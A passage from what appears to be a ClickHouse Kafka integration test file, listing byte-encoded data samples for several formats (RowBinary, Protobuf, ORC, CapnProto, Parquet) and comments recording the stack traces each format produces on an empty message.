00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
# ''
# On empty message exception happens: DB::Exception: Cannot read all data. Bytes read: 0. Bytes expected: 8.
# /src/IO/ReadBuffer.h:157: DB::ReadBuffer::readStrict(char*, unsigned long) @ 0x15c6894d in /usr/bin/clickhouse
# /src/IO/ReadHelpers.h:108: void DB::readPODBinary<long>(long&, DB::ReadBuffer&) @ 0x15c67715 in /usr/bin/clickhouse
# /src/IO/ReadHelpers.h:737: std::__1::enable_if<is_arithmetic_v<long>, void>::type DB::readBinary<long>(long&, DB::ReadBuffer&) @ 0x15e7afbd in /usr/bin/clickhouse
# /src/DataTypes/DataTypeNumberBase.cpp:180: DB::DataTypeNumberBase<long>::deserializeBinary(DB::IColumn&, DB::ReadBuffer&) const @ 0x1cace581 in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/BinaryRowInputFormat.cpp:22: DB::BinaryRowInputFormat::readRow(std::__1::vector<COW<DB::IColumn>::mutable_ptr<DB::IColumn>, std::__1::allocator<COW<DB::IColumn>::mutable_ptr<DB::IColumn> > >&, DB::RowReadExtension&) @ 0x1dea2c0b in /usr/bin/clickhouse
],
},
'RowBinaryWithNamesAndTypes': {
'data_sample': [
b'\x05\x02\x69\x64\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x04\x76\x61\x6c\x31\x04\x76\x61\x6c\x32\x04\x76\x61\x6c\x33\x05\x49\x6e\x74\x36\x34\x06\x55\x49\x6e\x74\x31\x36\x06\x53\x74\x72\x69\x6e\x67\x07\x46\x6c\x6f\x61\x74\x33\x32\x05\x55\x49\x6e\x74\x38\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x05\x02\x69\x64\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x04\x76\x61\x6c\x31\x04\x76\x61\x6c\x32\x04\x76\x61\x6c\x33\x05\x49\x6e\x74\x36\x34\x06\x55\x49\x6e\x74\x31\x36\x06\x53\x74\x72\x69\x6e\x67\x07\x46\x6c\x6f\x61\x74\x33\x32\x05\x55\x49\x6e\x74\x38\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x09\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x05\x02\x69\x64\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x04\x76\x61\x6c\x31\x04\x76\x61\x6c\x32\x04\x76\x61\x6c\x33\x05\x49\x6e\x74\x36\x34\x06\x55\x49\x6e\x74\x31\x36\x06\x53\x74\x72\x69\x6e\x67\x07\x46\x6c\x6f\x61\x74\x33\x32\x05\x55\x49\x6e\x74\x38\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
# ''
# !!! On empty message segfault: Address not mapped to object
# /contrib/FastMemcpy/FastMemcpy.h:666: memcpy_fast @ 0x21742d65 in /usr/bin/clickhouse
# /contrib/FastMemcpy/memcpy_wrapper.c:5: memcpy @ 0x21738235 in /usr/bin/clickhouse
# /src/IO/ReadBuffer.h:145: DB::ReadBuffer::read(char*, unsigned long) @ 0x15c369d7 in /usr/bin/clickhouse
# /src/IO/ReadBuffer.h:155: DB::ReadBuffer::readStrict(char*, unsigned long) @ 0x15c68878 in /usr/bin/clickhouse
# /src/DataTypes/DataTypeString.cpp:84: DB::DataTypeString::deserializeBinary(DB::IColumn&, DB::ReadBuffer&) const @ 0x1cad12e7 in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/BinaryRowInputFormat.cpp:22: DB::BinaryRowInputFormat::readRow(std::__1::vector<COW<DB::IColumn>::mutable_ptr<DB::IColumn>, std::__1::allocator<COW<DB::IColumn>::mutable_ptr<DB::IColumn> > >&, DB::RowReadExtension&) @ 0x1dea2c0b in /usr/bin/clickhouse
],
},
'Protobuf': {
'data_sample': [
b'\x0b\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01',
b'\x0d\x08\x01\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x02\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x03\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x04\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x05\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x06\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x07\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x08\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x09\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x0a\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x0b\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x0c\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x0d\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x0e\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x0f\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01',
b'\x0b\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01',
# ''
# On empty message exception: Attempt to read after eof
# /src/IO/ReadBuffer.h:184: DB::ReadBuffer::throwReadAfterEOF() @ 0x15c9699b in /usr/bin/clickhouse
# /src/Formats/ProtobufReader.h:115: DB::ProtobufReader::SimpleReader::startMessage() @ 0x1df4f828 in /usr/bin/clickhouse
# /src/Formats/ProtobufReader.cpp:1119: DB::ProtobufReader::startMessage() @ 0x1df5356c in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/ProtobufRowInputFormat.cpp:25: DB::ProtobufRowInputFormat::readRow(std::__1::vector<COW<DB::IColumn>::mutable_ptr<DB::IColumn>, std::__1::allocator<COW<DB::IColumn>::mutable_ptr<DB::IColumn> > >&, DB::RowReadExtension&) @ 0x1df4cc71 in /usr/bin/clickhouse
# /src/Processors/Formats/IRowInputFormat.cpp:64: DB::IRowInputFormat::generate() @ 0x1de727cf in /usr/bin/clickhouse
],
'extra_settings': ", kafka_schema='test:TestMessage'"
},
'ORC': {
'data_sample': [
b'\x4f\x52\x43\x11\x00\x00\x0a\x06\x12\x04\x08\x01\x50\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x30\x00\x00\xe3\x12\xe7\x62\x65\x00\x01\x21\x3e\x0e\x46\x25\x0e\x2e\x46\x03\x21\x46\x03\x09\xa6\x00\x06\x00\x32\x00\x00\xe3\x92\xe4\x62\x65\x00\x01\x21\x01\x0e\x46\x25\x2e\x2e\x26\x47\x5f\x21\x20\x96\x60\x09\x60\x00\x00\x36\x00\x00\xe3\x92\xe1\x62\x65\x00\x01\x21\x61\x0e\x46\x23\x5e\x2e\x46\x03\x21\x66\x03\x3d\x53\x29\x10\x11\xc0\x00\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x02\x10\x02\x18\x02\x50\x00\x05\x00\x00\xff\x00\x03\x00\x00\x30\x07\x00\x00\x40\x00\x80\x05\x00\x00\x41\x4d\x07\x00\x00\x42\x00\x80\x03\x00\x00\x0a\x07\x00\x00\x42\x00\x80\x05\x00\x00\xff\x01\x88\x00\x00\x4d\xca\xc1\x0a\x80\x30\x0c\x03\xd0\x2e\x6b\xcb\x98\x17\xf1\x14\x50\xfc\xff\xcf\xb4\x66\x1e\x3c\x84\x47\x9a\xce\x1c\xb9\x1b\xb7\xf9\xda\x48\x09\x9e\xb2\xf3\x92\xce\x5b\x86\xf6\x56\x7f\x21\x41\x2f\x51\xa6\x7a\xd7\x1d\xe5\xea\xae\x3d\xca\xd5\x83\x71\x60\xd8\x17\xfc\x62\x0f\xa8\x00\x00\xe3\x4a\xe6\x62\xe1\x60\x0c\x60\xe0\xe2\xe3\x60\x14\x62\xe3\x60\x10\x60\x90\x60\x08\x60\x88\x60\xe5\x12\xe0\x60\x54\xe2\xe0\x62\x34\x10\x62\x34\x90\x60\x02\x8a\x70\x71\x09\x01\x45\xb8\xb8\x98\x1c\x7d\x85\x80\x58\x82\x05\x28\xc6\xcd\x25\xca\xc1\x68\xc4\x0b\x52\xc5\x6c\xa0\x67\x2a\x05\x22\xc0\x4a\x21\x86\x31\x09\x30\x81\xb5\xb2\x02\x00\x36\x01\x00\x25\x8c\xbd\x0a\xc2\x30\x14\x85\x73\x6f\x92\xf6\x92\x6a\x09\x01\x21\x64\x92\x4e\x75\x91\x58\x71\xc9\x64\x27\x5d\x2c\x1d\x5d\xfd\x59\xc4\x42\x37\x5f\xc0\x17\xe8\x23\x9b\xc6\xe1\x3b\x70\x0f\xdf\xb9\xc4\xf5\x17\x5d\x41\x5c\x4f\x60\x37\xeb\x53\x0d\x55\x4d\x0b\x23\x01\xb9\x90\x2e\xbf\x0f\xe3\xe3\xdd\x8d\x0e\x5f\x4f\x27\x3e\xb7\x61\x97\xb2\x49\xb9\xaf\x90\x20\x92\x27\x32\x2a\x6b\xf4\xf3\x0d\x1e\x82\x20\xe8\x59\x28\x09\x4c\x46\x4c\x33\xcb\x7a\x76\x95\x41\x47\x9f\x14\x78\x03\xde\x62\x6c\x54\x30\xb1\x51\x0a\xdb\x8b\x89\x58\x11\xbb\x22\xac\x08\x9a\xe5\x6c\x71\xbf\x3d\xb8\x39\x92\xfa\x7f\x86\x1a\xd3\x54\x1e\xa7\xee\xcc\x7e\x08\x9e\x01\x10\x01\x18\x80\x80\x10\x22\x02\x00\x0c\x28\x57\x30\x06\x82\xf4\x03\x03\x4f\x52\x43\x18',
b'\x4f\x52\x43\x11\x00\x00\x0a\x06\x12\x04\x08\x0f\x50\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x0f\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x30\x00\x00\xe3\x12\xe7\x62\x65\x00\x01\x21\x3e\x0e\x7e\x25\x0e\x2e\x46\x43\x21\x46\x4b\x09\xad\x00\x06\x00\x33\x00\x00\x0a\x17\x0a\x03\x00\x00\x00\x12\x10\x08\x0f\x22\x0a\x0a\x02\x41\x4d\x12\x02\x41\x4d\x18\x3c\x50\x00\x3a\x00\x00\xe3\x92\xe1\x62\x65\x00\x01\x21\x61\x0e\x7e\x23\x5e\x2e\x46\x03\x21\x66\x03\x3d\x53\x29\x66\x73\x3d\xd3\x00\x06\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x0f\x12\x06\x08\x02\x10\x02\x18\x1e\x50\x00\x05\x00\x00\x0c\x00\x2b\x00\x00\x31\x32\x33\x34\x35\x36\x37\x38\x39\x31\x30\x31\x31\x31\x32\x31\x33\x31\x34\x31\x35\x09\x00\x00\x06\x01\x03\x02\x09\x00\x00\xc0\x0e\x00\x00\x07\x00\x00\x42\x00\x80\x05\x00\x00\x41\x4d\x0a\x00\x00\xe3\xe2\x42\x01\x00\x09\x00\x00\xc0\x0e\x02\x00\x05\x00\x00\x0c\x01\x94\x00\x00\x2d\xca\xc1\x0e\x80\x30\x08\x03\xd0\xc1\x60\x2e\xf3\x62\x76\x6a\xe2\x0e\xfe\xff\x57\x5a\x3b\x0f\xe4\x51\xe8\x68\xbd\x5d\x05\xe7\xf8\x34\x40\x3a\x6e\x59\xb1\x64\xe0\x91\xa9\xbf\xb1\x97\xd2\x95\x9d\x1e\xca\x55\x3a\x6d\xb4\xd2\xdd\x0b\x74\x9a\x74\xf7\x12\x39\xbd\x97\x7f\x7c\x06\xbb\xa6\x8d\x97\x17\xb4\x00\x00\xe3\x4a\xe6\x62\xe1\xe0\x0f\x60\xe0\xe2\xe3\xe0\x17\x62\xe3\x60\x10\x60\x90\x60\x08\x60\x88\x60\xe5\x12\xe0\xe0\x57\xe2\xe0\x62\x34\x14\x62\xb4\x94\xd0\x02\x8a\xc8\x73\x09\x01\x45\xb8\xb8\x98\x1c\x7d\x85\x80\x58\xc2\x06\x28\x26\xc4\x25\xca\xc1\x6f\xc4\xcb\xc5\x68\x20\xc4\x6c\xa0\x67\x2a\xc5\x6c\xae\x67\x0a\x14\xe6\x87\x1a\xc6\x24\xc0\x24\x21\x07\x32\x0c\x00\x4a\x01\x00\xe3\x60\x16\x58\xc3\x24\xc5\xcd\xc1\x2c\x30\x89\x51\xc2\x4b\xc1\x57\x83\x5f\x49\x83\x83\x47\x88\x95\x91\x89\x99\x85\x55\x8a\x3d\x29\x27\x3f\x39\xdb\x2f\x5f\x8a\x29\x33\x45\x8a\xa5\x2c\x31\xc7\x10\x4c\x1a\x81\x49\x63\x25\x26\x0e\x46\x20\x66\x07\x63\x36\x0e\x3e\x0d\x26\x03\x10\x9f\xd1\x80\xdf\x8a\x85\x83\x3f\x80\xc1\x8a\x8f\x83\x5f\x88\x8d\x83\x41\x80\x41\x82\x21\x80\x21\x82\xd5\x4a\x80\x83\x5f\x89\x83\x8b\xd1\x50\x88\xd1\x52\x42\x0b\x28\x22\x6f\x25\x04\x14\xe1\xe2\x62\x72\xf4\x15\x02\x62\x09\x1b\xa0\x98\x90\x95\x28\x07\xbf\x11\x2f\x17\xa3\x81\x10\xb3\x81\x9e\xa9\x14\xb3\xb9\x9e\x29\x50\x98\x1f\x6a\x18\x93\x00\x93\x84\x1c\xc8\x30\x87\x09\x7e\x1e\x0c\x00\x08\xa8\x01\x10\x01\x18\x80\x80\x10\x22\x02\x00\x0c\x28\x5d\x30\x06\x82\xf4\x03\x03\x4f\x52\x43\x18',
b'\x4f\x52\x43\x11\x00\x00\x0a\x06\x12\x04\x08\x01\x50\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x30\x00\x00\xe3\x12\xe7\x62\x65\x00\x01\x21\x3e\x0e\x46\x25\x0e\x2e\x46\x03\x21\x46\x03\x09\xa6\x00\x06\x00\x32\x00\x00\xe3\x92\xe4\x62\x65\x00\x01\x21\x01\x0e\x46\x25\x2e\x2e\x26\x47\x5f\x21\x20\x96\x60\x09\x60\x00\x00\x36\x00\x00\xe3\x92\xe1\x62\x65\x00\x01\x21\x61\x0e\x46\x23\x5e\x2e\x46\x03\x21\x66\x03\x3d\x53\x29\x10\x11\xc0\x00\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x02\x10\x02\x18\x02\x50\x00\x05\x00\x00\xff\x00\x03\x00\x00\x30\x07\x00\x00\x40\x00\x80\x05\x00\x00\x41\x4d\x07\x00\x00\x42\x00\x80\x03\x00\x00\x0a\x07\x00\x00\x42\x00\x80\x05\x00\x00\xff\x01\x88\x00\x00\x4d\xca\xc1\x0a\x80\x30\x0c\x03\xd0\x2e\x6b\xcb\x98\x17\xf1\x14\x50\xfc\xff\xcf\xb4\x66\x1e\x3c\x84\x47\x9a\xce\x1c\xb9\x1b\xb7\xf9\xda\x48\x09\x9e\xb2\xf3\x92\xce\x5b\x86\xf6\x56\x7f\x21\x41\x2f\x51\xa6\x7a\xd7\x1d\xe5\xea\xae\x3d\xca\xd5\x83\x71\x60\xd8\x17\xfc\x62\x0f\xa8\x00\x00\xe3\x4a\xe6\x62\xe1\x60\x0c\x60\xe0\xe2\xe3\x60\x14\x62\xe3\x60\x10\x60\x90\x60\x08\x60\x88\x60\xe5\x12\xe0\x60\x54\xe2\xe0\x62\x34\x10\x62\x34\x90\x60\x02\x8a\x70\x71\x09\x01\x45\xb8\xb8\x98\x1c\x7d\x85\x80\x58\x82\x05\x28\xc6\xcd\x25\xca\xc1\x68\xc4\x0b\x52\xc5\x6c\xa0\x67\x2a\x05\x22\xc0\x4a\x21\x86\x31\x09\x30\x81\xb5\xb2\x02\x00\x36\x01\x00\x25\x8c\xbd\x0a\xc2\x30\x14\x85\x73\x6f\x92\xf6\x92\x6a\x09\x01\x21\x64\x92\x4e\x75\x91\x58\x71\xc9\x64\x27\x5d\x2c\x1d\x5d\xfd\x59\xc4\x42\x37\x5f\xc0\x17\xe8\x23\x9b\xc6\xe1\x3b\x70\x0f\xdf\xb9\xc4\xf5\x17\x5d\x41\x5c\x4f\x60\x37\xeb\x53\x0d\x55\x4d\x0b\x23\x01\xb9\x90\x2e\xbf\x0f\xe3\xe3\xdd\x8d\x0e\x5f\x4f\x27\x3e\xb7\x61\x97\xb2\x49\xb9\xaf\x90\x20\x92\x27\x32\x2a\x6b\xf4\xf3\x0d\x1e\x82\x20\xe8\x59\x28\x09\x4c\x46\x4c\x33\xcb\x7a\x76\x95\x41\x47\x9f\x14\x78\x03\xde\x62\x6c\x54\x30\xb1\x51\x0a\xdb\x8b\x89\x58\x11\xbb\x22\xac\x08\x9a\xe5\x6c\x71\xbf\x3d\xb8\x39\x92\xfa\x7f\x86\x1a\xd3\x54\x1e\xa7\xee\xcc\x7e\x08\x9e\x01\x10\x01\x18\x80\x80\x10\x22\x02\x00\x0c\x28\x57\x30\x06\x82\xf4\x03\x03\x4f\x52\x43\x18',
# ''
# On empty message exception: IOError: File size too small, Stack trace (when copying this message, always include the lines below):
# /src/Processors/Formats/Impl/ORCBlockInputFormat.cpp:36: DB::ORCBlockInputFormat::generate() @ 0x1df282a6 in /usr/bin/clickhouse
# /src/Processors/ISource.cpp:48: DB::ISource::work() @ 0x1dd79737 in /usr/bin/clickhouse
],
},
'CapnProto': {
'data_sample': [
b'\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00',
b'\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x09\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00',
b'\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00',
# ''
# On empty message exception: Cannot read all data. Bytes read: 0. Bytes expected: 4.
# /src/IO/ReadBuffer.h:157: DB::ReadBuffer::readStrict(char*, unsigned long) @ 0x15c6894d in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/CapnProtoRowInputFormat.cpp:212: DB::CapnProtoRowInputFormat::readMessage() @ 0x1ded1cab in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/CapnProtoRowInputFormat.cpp:241: DB::CapnProtoRowInputFormat::readRow(std::__1::vector<COW<DB::IColumn>::mutable_ptr<DB::IColumn>, std::__1::allocator<COW<DB::IColumn>::mutable_ptr<DB::IColumn> > >&, DB::RowReadExtension&) @ 0x1ded205d in /usr/bin/clickhouse
],
'extra_settings': ", kafka_schema='test:TestRecordStruct'"
},
'Parquet' : {
'data_sample': [
b'\x50\x41\x52\x31\x15\x04\x15\x10\x15\x14\x4c\x15\x02\x15\x04\x12\x00\x00\x08\x1c\x00\x00\x00\x00\x00\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xbc\x01\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x02\x16\xac\x01\x16\xb4\x01\x26\x38\x26\x08\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xc8\x03\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xfc\x02\x26\xd4\x02\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x0c\x15\x10\x4c\x15\x02\x15\x04\x12\x00\x00\x06\x14\x02\x00\x00\x00\x41\x4d\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x03\x08\x01\x02\x00\x26\xa2\x05\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x02\x16\x68\x16\x70\x26\xde\x04\x26\xb2\x04\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x3f\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x03\x08\x01\x02\x00\x26\x8a\x07\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x02\x16\x84\x01\x16\x8c\x01\x26\xa6\x06\x26\xfe\x05\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x01\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xfe\x08\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xb2\x08\x26\x8a\x08\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x15\x02\x19\x6c\x35\x00\x18\x06\x73\x63\x68\x65\x6d\x61\x15\x0a\x00\x15\x04\x25\x00\x18\x02\x69\x64\x00\x15\x02\x25\x00\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x25\x18\